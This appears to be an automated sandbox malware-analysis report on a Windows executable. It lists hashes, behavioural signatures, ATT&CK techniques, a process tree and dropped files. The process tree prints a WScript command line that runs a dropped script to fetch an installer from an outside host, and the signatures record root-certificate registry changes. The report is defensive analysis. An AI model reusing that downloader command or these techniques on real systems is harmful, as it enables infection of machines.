af082c7daced6b11c17d0fbb360bc05d0e96f5cc385d75813bb1ef8c9ca215f1

General

Target

af082c7daced6b11c17d0fbb360bc05d0e96f5cc385d75813bb1ef8c9ca215f1.exe
Size

184KB
MD5

83dc905cc166a8dd7f69d70a83538e50
SHA1

12931ded40b5cf6a7a5afcf037f9f4f47483eba4
SHA256

af082c7daced6b11c17d0fbb360bc05d0e96f5cc385d75813bb1ef8c9ca215f1
SHA512

5c8612988d4a1338e4970ffc1fe0694a0840ab763146f8c04204cb20d0947ad94f80ae35cf084978c561dc82d3cc43dbf4c221fa34162ee999d1e3b303d4b70f
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3N:/7BSH8zUB+nGESaaRvoB7FJNndnM

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 14 IoCs

flow	pid	Process
3	792	WScript.exe
6	792	WScript.exe
7	1780	WScript.exe
9	1780	WScript.exe
10	1640	WScript.exe
12	1640	WScript.exe
13	1204	WScript.exe
15	1204	WScript.exe
16	1972	WScript.exe
18	1972	WScript.exe
20	1972	WScript.exe
22	1972	WScript.exe
24	1972	WScript.exe
26	1972	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1576	1888	WerFault.exe	19

Modifies system certificate store 2 TTPs 3 IoCs

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	WScript.exe

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	3	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	7	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	10	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	16	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 1888 wrote to memory of 792	1888	af082c7daced6b11c17d0fbb360bc05d0e96f5cc385d75813bb1ef8c9ca215f1.exe	28
PID 1888 wrote to memory of 792	1888	af082c7daced6b11c17d0fbb360bc05d0e96f5cc385d75813bb1ef8c9ca215f1.exe	28
PID 1888 wrote to memory of 792	1888	af082c7daced6b11c17d0fbb360bc05d0e96f5cc385d75813bb1ef8c9ca215f1.exe	28
PID 1888 wrote to memory of 792	1888	af082c7daced6b11c17d0fbb360bc05d0e96f5cc385d75813bb1ef8c9ca215f1.exe	28
PID 1888 wrote to memory of 1780	1888	af082c7daced6b11c17d0fbb360bc05d0e96f5cc385d75813bb1ef8c9ca215f1.exe	31
PID 1888 wrote to memory of 1780	1888	af082c7daced6b11c17d0fbb360bc05d0e96f5cc385d75813bb1ef8c9ca215f1.exe	31
PID 1888 wrote to memory of 1780	1888	af082c7daced6b11c17d0fbb360bc05d0e96f5cc385d75813bb1ef8c9ca215f1.exe	31
PID 1888 wrote to memory of 1780	1888	af082c7daced6b11c17d0fbb360bc05d0e96f5cc385d75813bb1ef8c9ca215f1.exe	31
PID 1888 wrote to memory of 1640	1888	af082c7daced6b11c17d0fbb360bc05d0e96f5cc385d75813bb1ef8c9ca215f1.exe	32
PID 1888 wrote to memory of 1640	1888	af082c7daced6b11c17d0fbb360bc05d0e96f5cc385d75813bb1ef8c9ca215f1.exe	32
PID 1888 wrote to memory of 1640	1888	af082c7daced6b11c17d0fbb360bc05d0e96f5cc385d75813bb1ef8c9ca215f1.exe	32
PID 1888 wrote to memory of 1640	1888	af082c7daced6b11c17d0fbb360bc05d0e96f5cc385d75813bb1ef8c9ca215f1.exe	32
PID 1888 wrote to memory of 1204	1888	af082c7daced6b11c17d0fbb360bc05d0e96f5cc385d75813bb1ef8c9ca215f1.exe	33
PID 1888 wrote to memory of 1204	1888	af082c7daced6b11c17d0fbb360bc05d0e96f5cc385d75813bb1ef8c9ca215f1.exe	33
PID 1888 wrote to memory of 1204	1888	af082c7daced6b11c17d0fbb360bc05d0e96f5cc385d75813bb1ef8c9ca215f1.exe	33
PID 1888 wrote to memory of 1204	1888	af082c7daced6b11c17d0fbb360bc05d0e96f5cc385d75813bb1ef8c9ca215f1.exe	33
PID 1888 wrote to memory of 1972	1888	af082c7daced6b11c17d0fbb360bc05d0e96f5cc385d75813bb1ef8c9ca215f1.exe	34
PID 1888 wrote to memory of 1972	1888	af082c7daced6b11c17d0fbb360bc05d0e96f5cc385d75813bb1ef8c9ca215f1.exe	34
PID 1888 wrote to memory of 1972	1888	af082c7daced6b11c17d0fbb360bc05d0e96f5cc385d75813bb1ef8c9ca215f1.exe	34
PID 1888 wrote to memory of 1972	1888	af082c7daced6b11c17d0fbb360bc05d0e96f5cc385d75813bb1ef8c9ca215f1.exe	34
PID 1888 wrote to memory of 1576	1888	af082c7daced6b11c17d0fbb360bc05d0e96f5cc385d75813bb1ef8c9ca215f1.exe	36
PID 1888 wrote to memory of 1576	1888	af082c7daced6b11c17d0fbb360bc05d0e96f5cc385d75813bb1ef8c9ca215f1.exe	36
PID 1888 wrote to memory of 1576	1888	af082c7daced6b11c17d0fbb360bc05d0e96f5cc385d75813bb1ef8c9ca215f1.exe	36
PID 1888 wrote to memory of 1576	1888	af082c7daced6b11c17d0fbb360bc05d0e96f5cc385d75813bb1ef8c9ca215f1.exe	36

C:\Users\Admin\AppData\Local\Temp\af082c7daced6b11c17d0fbb360bc05d0e96f5cc385d75813bb1ef8c9ca215f1.exe
"C:\Users\Admin\AppData\Local\Temp\af082c7daced6b11c17d0fbb360bc05d0e96f5cc385d75813bb1ef8c9ca215f1.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1888
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufA1CC.js" http://www.djapp.info/?domain=ltsNWwBKoh.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LrsDjMuaUM9CgqlVE0PvlMlmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGIgkQVe88uQeqVvF6ZIoKUhkpvZWpzwXHeObuK-6mX4GJU2Nia1-_MKHVlwz C:\Users\Admin\AppData\Local\Temp\fufA1CC.exe
  2⤵
  - Blocklisted process makes network request
  PID:792
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufA1CC.js" http://www.djapp.info/?domain=ltsNWwBKoh.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LrsDjMuaUM9CgqlVE0PvlMlmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGIgkQVe88uQeqVvF6ZIoKUhkpvZWpzwXHeObuK-6mX4GJU2Nia1-_MKHVlwz C:\Users\Admin\AppData\Local\Temp\fufA1CC.exe
  2⤵
  - Blocklisted process makes network request
  PID:1780
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufA1CC.js" http://www.djapp.info/?domain=ltsNWwBKoh.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LrsDjMuaUM9CgqlVE0PvlMlmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGIgkQVe88uQeqVvF6ZIoKUhkpvZWpzwXHeObuK-6mX4GJU2Nia1-_MKHVlwz C:\Users\Admin\AppData\Local\Temp\fufA1CC.exe
  2⤵
  - Blocklisted process makes network request
  PID:1640
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufA1CC.js" http://www.djapp.info/?domain=ltsNWwBKoh.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LrsDjMuaUM9CgqlVE0PvlMlmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGIgkQVe88uQeqVvF6ZIoKUhkpvZWpzwXHeObuK-6mX4GJU2Nia1-_MKHVlwz C:\Users\Admin\AppData\Local\Temp\fufA1CC.exe
  2⤵
  - Blocklisted process makes network request
  PID:1204
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufA1CC.js" http://www.djapp.info/?domain=ltsNWwBKoh.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LrsDjMuaUM9CgqlVE0PvlMlmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGIgkQVe88uQeqVvF6ZIoKUhkpvZWpzwXHeObuK-6mX4GJU2Nia1-_MKHVlwz C:\Users\Admin\AppData\Local\Temp\fufA1CC.exe
  2⤵
  - Blocklisted process makes network request
  - Modifies system certificate store
  PID:1972
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1888 -s 232
  2⤵
  - Program crash
  PID:1576

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

Modify Registry

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\fufA1CC.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\WD0JT5KN.txt

Filesize
99B

MD5
491cdc507f39c5ed3d9763fb6248f053

SHA1
d3649030c158f0e06fba90803bb61c1f6442a705

SHA256
d6347711dea7e96981f8b99c027e33a2f9eb964e1c66bedf6afe314443b50c5b

SHA512
d21e7959b3ea1eebe4261b3a5e6aa944d2f64f5da8a8c27aa0ea8edd9297b6058b12558078ab1454a465dd805e2379534167fa006377f736003b81c8ea1efdb6

Download Submit
memory/1888-54-0x00000000757E1000-0x00000000757E3000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing